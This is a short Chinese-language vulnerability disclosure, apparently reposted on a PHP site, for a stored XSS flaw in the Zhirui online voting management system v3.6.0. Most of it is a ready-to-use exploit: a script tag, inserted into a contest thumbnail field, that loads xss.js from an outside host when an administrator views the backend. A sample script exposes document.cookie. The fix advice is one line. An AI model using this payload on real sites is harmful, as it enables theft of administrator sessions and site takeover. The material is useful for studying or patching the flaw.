文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>智睿网络投票评选管理系统v3.6.0XSS漏洞

智睿网络投票评选管理系统v3.6.0XSS漏洞

时间:2011-01-14  来源:黑白前线

发布日期:2011-01.14
发布作者:B0mbErM@n

影响版本:智睿网络投票评选管理系统v3.6.0
官方网站:http://www.zhirui.net

漏洞类型:跨站XSS
漏洞描述:UserAdd.asp过滤不严导致提交跨站代码执行js脚本。


Exp:注册用户 > 发表评选 > 评选缩图中插入XSS代码
"><SCRIPT SRC=http://521.im/XSS/xss.js></SCRIPT>
然后等后台打开时触发.js地址神马的自己替换..js的强大就不解释了..
 

JS:

document.write ("This is remote text via xss.js located at 521.im " + document.cookie);  alert ("This is remote text via xss.js located at 521.im " + document.cookie); 

修补:过滤呀过滤
 

标签分类: 跨站XSS

相关阅读 更多 +
排行榜 更多 +
翌日波奇狗的历险记手机版下载

翌日波奇狗的历险记手机版下载

休闲益智 下载
怪兽远征安卓版下载

怪兽远征安卓版下载

角色扮演 下载
谷歌卫星地图免费版下载

谷歌卫星地图免费版下载

生活实用 下载